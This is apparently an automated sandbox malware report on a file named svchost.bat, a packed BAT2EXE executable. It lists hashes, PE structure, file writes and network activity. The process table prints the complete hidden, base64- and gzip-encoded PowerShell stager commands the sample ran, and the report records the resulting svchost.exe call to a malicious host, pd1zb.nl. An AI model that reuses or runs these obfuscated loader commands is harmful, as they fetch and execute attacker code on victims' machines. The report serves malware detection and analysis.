File name: | svchost.bat |
Full analysis: | https://app.any.run/tasks/39278399-c9f5-403f-98ec-9bbce4f0cc71 |
Verdict: | Malicious activity |
Analysis date: | July 12, 2020, 20:14:58 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed |
MD5: | 0767EB3211CAA86562D02E38CB822753 |
SHA1: | 52E5BE24B133CE6DE502AC902C7B4487F69C5A3C |
SHA256: | B3A28A7436D81D8E55808601C8E711432010F0DC413465CF33A2BE1B9995E742 |
SSDEEP: | 12288:jyp3SI7vpPdCtH1FJfageWsTLtp92xF14a70MJ02HUElRKcMJxYFIITlnkiC:ZIzpCFRahWovMxFz70m/H2VmTaD |
.exe | | | UPX compressed Win32 Executable (64.2) |
---|---|---|
.dll | | | Win32 Dynamic Link Library (generic) (15.6) |
.exe | | | Win32 Executable (generic) (10.6) |
.exe | | | Generic Win/DOS Executable (4.7) |
.exe | | | DOS Executable Generic (4.7) |
ProductVersion: | 1.7 |
---|---|
ProductName: | BAT2EXE |
OriginalFileName: | bat2exe.exe |
LegalCopyright: | Islam Adel |
InternalName: | bat2exe.exe |
FileVersion: | 1.7 |
FileDescription: | Created by BAT2EXE.net |
CompanyName: | Islam Adel |
CharacterSet: | Unicode |
LanguageCode: | English (U.S.) |
FileSubtype: | - |
ObjectFileType: | Executable application |
FileOS: | Windows NT 32-bit |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 1.7.0.0 |
FileVersionNumber: | 1.7.0.0 |
Subsystem: | Windows GUI |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x268f0 |
UninitializedDataSize: | 98304 |
InitializedDataSize: | 20480 |
CodeSize: | 57344 |
LinkerVersion: | 6 |
PEType: | PE32 |
TimeStamp: | 2016:10:04 17:12:31+02:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 04-Oct-2016 15:12:31 |
Detected languages: |
|
CompanyName: | Islam Adel |
FileDescription: | Created by BAT2EXE.net |
FileVersion: | 1.7 |
InternalName: | bat2exe.exe |
LegalCopyright: | Islam Adel |
OriginalFilename: | bat2exe.exe |
ProductName: | BAT2EXE |
ProductVersion: | 1.7 |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000110 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 04-Oct-2016 15:12:31 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
UPX0 | 0x00001000 | 0x00018000 | 0x00000000 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0 |
UPX1 | 0x00019000 | 0x0000E000 | 0x0000DC00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.87423 |
.rsrc | 0x00027000 | 0x00005000 | 0x00004600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 5.92962 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 4.93201 | 848 | UNKNOWN | English - United States | RT_MANIFEST |
2 | 6.01638 | 4264 | UNKNOWN | English - United States | RT_ICON |
3 | 5.70086 | 1128 | UNKNOWN | English - United States | RT_ICON |
97 | 6.83857 | 184 | UNKNOWN | English - United States | RT_DIALOG |
188 | 5.99339 | 84 | UNKNOWN | English - United States | RT_STRING |
207 | 5.46967 | 52 | UNKNOWN | English - United States | RT_STRING |
KERNEL32.DLL |
MSVCRT.dll |
OLEAUT32.dll |
SHELL32.dll |
USER32.dll |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1232 | "C:\Users\admin\AppData\Local\Temp\svchost.bat" | C:\Users\admin\AppData\Local\Temp\svchost.bat | explorer.exe | |
User: admin Company: Islam Adel Integrity Level: MEDIUM Description: Created by BAT2EXE.net Exit code: 0 Version: 1.7 | ||||
540 | cmd /c ""C:\Users\admin\AppData\Local\Temp\7zS0D4C8896\svchost.bat" " | C:\Windows\system32\cmd.exe | — | svchost.bat |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1548 | powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBNAHgAcgBDADEAOABDAEEANwBWAFcAZQAyAC8AYQBTAEIARAAvAHUANQBYADYASABhAHcASwBDAFYAdQBoAG0ASQBkAEQAUQBxAFcAVAB6AGoAYgBZAEoAcwBWAEEAWQBoAHMASABjAHUAaQAwADIASQB2AFoAWgBHADAAVABlAHgAMABnAGQALwBmAGQAYgB4AFoAdwBtADEANwBUAFUAMwB2AFMAVwBUAHoAVwBzAHoATwB6AE0ANwA5ADUANwBhAHAASQBBAGsAYgBTAFIATgBqAHYAaABEAC8AZQB2AFgAMAB6AFEAUgBtAEsAQgBiAEcAeQBhAHcAVwBmAGEAawBKAGwAcAB4AGoAUwBtAHoAZABBAHIAMQBCAEYAKwBFAFUAUQA3ADkAVABOAHAAcABmAEcAaQBDAFMATABqAHgALwAxAEkAcwB0AHcAdwBvADcAdgBkAFIATQB6AE4AYwA5AHgAdgBLAFEARQA1ADYASQBrAC8AQwBuADQAYQA1AHoAaABEACsAUABsAFAAUQA2AFkAOABJAGQAUQArAGIAMQB1ADAAbgBTAEoANgBJAGwAdAByADYATgBnAGoAWQBVAFAAYQBoAEwAeQB2AFcARQBhAEkARwA1AEoAMwBkAGwAUQB3AHMAVABxAGIANwA5AFYAcABiAHMAUAB6AFUAVwA5AC8AMQBnAGcAbQBvAHQAVgBaADUAOAB6AEgATgBkAEQAUwBxAHUAUwA4AEoAZgBFAEQAMwBUADMARwB5AHgAVwBiAFIASgBrAGEAWgA2AHUAVwBOADAAbgBTAGIAdABWADkANQBJAGMAcgBmAEEASQB0AEQAMQBoAEcANwBOADEARwB1AFoAVgBDAFgAeQBBAFQANABaAFoAawBTAFUAQwBlAE0AUABGAGoANQB0AGkARgBaAGEAVABMAEEAMwBVAE0ATQB4AHcAbgBsAGQAcgB3AGgAMQBYAGYATABkAFkALwBDAHIAZQBuAFUANgA5AEsAUgBKAEcAWQBsAHcAZgBKAEEAeABuADYAYwBiAEIAMgBSAE0ASgBjAEYANgAzAFUAQgBKAFMAZgBJAE4AWABDADUAQgB5AFcARQBhAFMAYQBDAEYASgB3AFAAYQBVAFAAbQBDAHgAawBoAFMAVQAxAG8AUwBmAFUAUwBPAE8AOABMAGIARQA3AEUAZQBGAHgASgBkAEMAdwBEAFYAaABtAFYAUwBEAEkASAA3AGoAcABaADIARwBCAGMAVgBIAHUAZQBvAHIAWgBoADcAQwBMAHMARgB6AEMAagAyAGcAOQB0AGUANwB0ACsALwBlAHIAcwBvAHMAeQBmAG8AdgBzAHcAUgBXAGIAKwA0AE8AYQB3AHkAVwBpAFoATQAwAEoAdwBlAHUAWAA0AFIARwBUAGIARABoAEYATQBUAFMAYgBBACsAdgBGAFQAYwByAHMATABUADQAagBLAHQAUQBDAGQAawB5AHEASAAxAGYAdgBsAGsAeQBBACsAcwBxAFcAegAwAEEANgBXADYAYQBrAG4AQQBCAEkAcQBkAFEAVgByAEoAKwBwAG4AUAA2ADkAMQBPAHkAaAAxAGMAawB3AGIAMQA5AGcAbQBJAFMAbABGAGsAbgB2AG8AWQB3AFgAbABGADgAOABMAEIAZQBzAG8AMwBBAEsATABGADYAMgBzAEIAaABEADEATQBjAEkAYwBaAFIANAA0AEgAKwBSAHEAdwBmAEUALwBaAFoAVgBpAHMASQBEAFgARwBtAEIAaABDAGwASABLAHkAQwBBAEUAcABmAEcAMwBNAE0AaABGAGcAZABKAEQAYQBPAEEAYQBQAGoATwAyAFIAZQBaAFEAVwA1AGoAawB2AHUAVQAzADcAdgB5ADkAUAA1AE8AegBCAFYAZABZAHIAeQB2AEMAWgBNAEMAaQBpADIAbwBDAFkANABHAEYARQBjADEAZwBRADEAeQBjAGwAcABTAHkAMQBZAGUAbABoAFcAdgA1AGgAcgBGADUAUwBSAEEATwBXAHMAVgBMAGUAUQBTAGgAeABQADUAKwBsAHAAawByAE8AcwBDAEMAQgBzADQATAB2AHIAYgBIAEIAQQBFAE8AVgBRADEAQQBTAEwAaABGAGoAYgBPAHkAUQBxAHoANgAyACsAQwBvAFMATwBLAEkAVQBpAEEARQAxAFAARQBBAGkAZwBjAEEAQQBjAHgAcABNAGgAQQB4AE0AUABnAFoAZgBxAEQAbQBhAEQAZQBFAE4AeABEAEQAeQBIAHEAagBjAG8AaQBxAEQARwBUADYAbAArAHkAQgA0AFUANABiAEQANgBUAHcAdgBMAFoARAA1AG0ATABzAGUAaQBCAE8ARwBGAGYAUgBCAGcAaAA2AGEAcwBKAGsAeABKAHgAcQBCADUASABIAEMARgBMAFAAcAB2AHgANwA5AG8ARwB3AGQARAA5AEEAeQBmAFEAaQBHAFcAOQBYAEcAbgA3AFIAbgBQADYAMABvAFMAOABlAHcAdABZAFQAbQBBAGsARABFAEEAdwBNAGoAUwBXAEUATQA1ADcAaQBqAEgASABpAEcAKwBsADgAZgB4AFMASQBYAG4AZABqAFkAeABkAE0AWABxAEIANQBNAEwAVwBWAGEAYQAzAHAAVwBwAE8AVwBoAG8AZgBFAEkAWABsAHQAeQBjAE4AZgB0AFgAWgBpACsAYgBHAFoAMABSAE4AcgBWAGIAcgAyAGMAdAB2AGUAWQBvADEAVQBCAE8ATgAwAGEAdQAxADUAeQA3AHkARQByAHMAaQBiAEkARQAzAGwAcwAxAE4ASABhAFAAMQA0AE8AZQAxAFkAYwA5AE8AMgBTAHUALwBCAHkAbQBXAFkAcQBkAGkAUwB4AFAAcAB5AFkAWgBxAHQAZQBxADIAbgBuAGUAWABYAFAANgBMAGkAVABkAGMANgBDAEQAUABwAGMAMAB0AGcAKwB5AFkAYgBpAGUAZgBOAGwARwBOAHMAcgBqAEoASgBHAGIAZgBpAGEAagB2AHIAcwBkADQAWgA3AGMAeABHAFEAcAB3AHgATwAwADUALwBmAEkANwBEADYASAArAGoAbgBGAHAAcQBkADIAegBBAHQATwBUAHAALwA0AHIALwB5AGMAUgBoAEUAWQBaAHUAcABYADUANgA2AGwAegBnAGYAcwAyAGgANAB3AHAAdwBkAGYAWQA4AEQAMgBuADkAUwB6AHQAawBOAG0ATwA3AG0AegB2AFoAegBkAGIAdgBXAGgAMwB0AE8AZQB0AHcAMQB0AGQAegBiAGMAZQB4AFEAUAB2AGIAVQArAGQATwA3ADMAUQAxAGMAegBGAEsAVQBSAGEAWQAyAHAATwBmAFEAZABWAFcAcwBvADcATQBvAGMAMgB4ADEAbgBsAGoAZgBJADEAdgBMAHQAMQBWAG0AKwBEAFMANQBIAFUARgB5AEsAWQB0ADIAMgAxAEgAWgBiAEcAYgBjAGIARAB5AEcAKwBtAFoARgBtADkASwBDAEcAbwA1AGgAcwBkADAATgBZAFEAMABNAGYARAA3AFYAQgByAGoAVQBHAHQASAArAGwAMwB5AHoAOQBsAGoASAAzAHEAUwBVAHIAUgBuAGYAbABwADcAbgBUAFUAWgBvAGgATQBzADkAcABxAEcAcABwADIASwBJAEYAbQB0ADYAawByAGgAWABFAEcAdQBEAEMAOABlAFAAWQBlAEcAZgBSAGoAcwBmAEoAOQBiAHMAZAA1AE8ALwB5AG0AWABQAFoASABOADYAcgAwAFMAYwBqADMAQwB6AGoAbQA2AGUAdwBiAFUAYwB1AHYAWQA1AEcAUgBOAG0ATgA5ADUAbwAxADkAMABmAFoAYwBuAC8AWgBCAHAANgBMAGcAWABYAFYARwB0AC8AMwBkADcARABlAHEARwBiAFUAbQBTAFoAeABJAG4AZQBuAHIAdABkAEsAZQA2AEQANwAwAGMAYgBFADUATABxAEgAKwArADQAcwBlAEEANQB2AG4ATwBlADUAYgAwAGYAYQBOAFQATAB3AFYAWABMAEoAWQA1AHEAWQBYAGcAdABBAGoAVQBtAGYAMgB6AEoAdABqAG4AdwAwAFoAdABQAGgALwBaAFAAYwBuAE0AOABmAEQAYQBOADcAcwBIAEUAYQBSADAAeABiAHIAeQAvAGsAcgBtADkAcwBMAGMAOQBEAFkANwBWAFEAdwBhAGUAYgBpAGQAcABVAEoAdgBMAFUAYgBkACsAdQBPADMAMABQAFQAdABJAGUAcgA4ADEASQA3AGMATQBLAHcAZgBkAGEAMQBWAHgAawBrAEEAZgB2ADcAQgBiADAAZwBhADkASwBrAGsAegBoAHYAQQBIAHMAUQBXADYAbAAvAFEAMgA2AFUAcAA3AGsANgBUAHIAUQBHAHMAOQBLAGIAcQBuAEIARwBQAFQAZgBVAHQAOABlAHIAVABvAFcAagAzAGwAMwBPACsAOABaAG4AUgBrADUATAA1AGEAcQBmAG4ARQA1ADkATQBrADAAVABsAFUAUAA4AEgAdgBQAFMAdwBkAHEAcAA1AEwASABMAHkAcgBpAGUANgBQAE0AUgBsAG0AKwBSAGgAUQBxAEIAYQBaAFUAMgBaADYATQBOAEQATgBPAGcAMgBlAFMARQBpADQAaABpAG4AQgBOAGUAYwBCAFoAZwBpAG4ATQBlAGIAZwBKAGwAQgBXAHUAVQBwAG8ARwBmAE8AYgBCAGcASQBKAHAAZQA1AHkAQgBmAEMAUgA3AHMARwB5ADMAWABsADEASgB3AG0AZABHADYAYwBzAHMATABFAGsAZgBQADgANwBCAFEAdQBnAFkAVQBOAEwAMQBJAFUANABpAHQAcQA0ADEAZAB1ADEARwBBADAAWgBiAFkANgBjADAAdwBMADAAZgBkADAAcABQAE4AMwB1AFIAYQA2AHIAeAB5AFEAaQBRAG4AUABUAFMAZwAxADYASgB0ADUAQQBLAFcAcgBuAC8ASgAxAEMAbgByAHIAVwBHAHYALwBEAGYAZwBmAHAAQwArADUAZgBkAEgAdwBLAHYAVQBlAE8AdQBmAGsAUAA4AG0AdgBCAFQAUQBQADYAawAwAHoANABpAEQAUABnAGMANgBMAGcAVQBIADAAZgArAGEANwA2AGYAOAB1AEgARgBoAFEAaQBDAEEAZABGAGUAbgBSADUAKwBtAFIAMABYADcATQBNAEkAcgBrAG4AdgAzAHYANABOAEMANABKAHAARwBUAE0ATABBAEEAQQA9ACcAJwApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2976 | "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2400 | svchost.exe | C:\Windows\system32\svchost.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Services Exit code: 3221225622 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SEYYJRN9I1WB0GM05PJN.temp | — | |
MD5:— | SHA256:— | |||
2976 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5S6J3ZOHMT2YK39UEW0L.temp | — | |
MD5:— | SHA256:— | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:1E90447D6420E49907C88DAEEC8BED05 | SHA256:9FE71CFB47F0331094D9EF67424CBE92C8C52B7CBCE21ED256020E30E2A758C5 | |||
1232 | svchost.bat | C:\Users\admin\AppData\Local\Temp\7zS0D4C8896\bat2exe.exe | executable | |
MD5:127F2FD9512451EF0E6350FE2AB3235B | SHA256:26994DBA49E6FDF0290AEB47971C4D3F81BDCA838A4A4B313A5C0442CD792845 | |||
2976 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:1E90447D6420E49907C88DAEEC8BED05 | SHA256:9FE71CFB47F0331094D9EF67424CBE92C8C52B7CBCE21ED256020E30E2A758C5 | |||
2976 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF168e98.TMP | binary | |
MD5:1E90447D6420E49907C88DAEEC8BED05 | SHA256:9FE71CFB47F0331094D9EF67424CBE92C8C52B7CBCE21ED256020E30E2A758C5 | |||
1232 | svchost.bat | C:\Users\admin\AppData\Local\Temp\7zS0D4C8896\svchost.bat | text | |
MD5:B9791F4697449F3F27F3F43C6A5F2D94 | SHA256:E49AD6EF14B266DF64D6146B8749256AEF56F7F2EA9AB005C96BD69B1D0FCE43 | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF168bf9.TMP | binary | |
MD5:1E90447D6420E49907C88DAEEC8BED05 | SHA256:9FE71CFB47F0331094D9EF67424CBE92C8C52B7CBCE21ED256020E30E2A758C5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2400 | svchost.exe | GET | 200 | 109.237.221.83:49 | http://pd1zb.nl:49//Xs7QK6V2 | NL | html | 52 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2400 | svchost.exe | 109.237.221.83:49 | pd1zb.nl | Mihos | NL | malicious |
Domain | IP | Reputation |
---|---|---|
pd1zb.nl |
| malicious |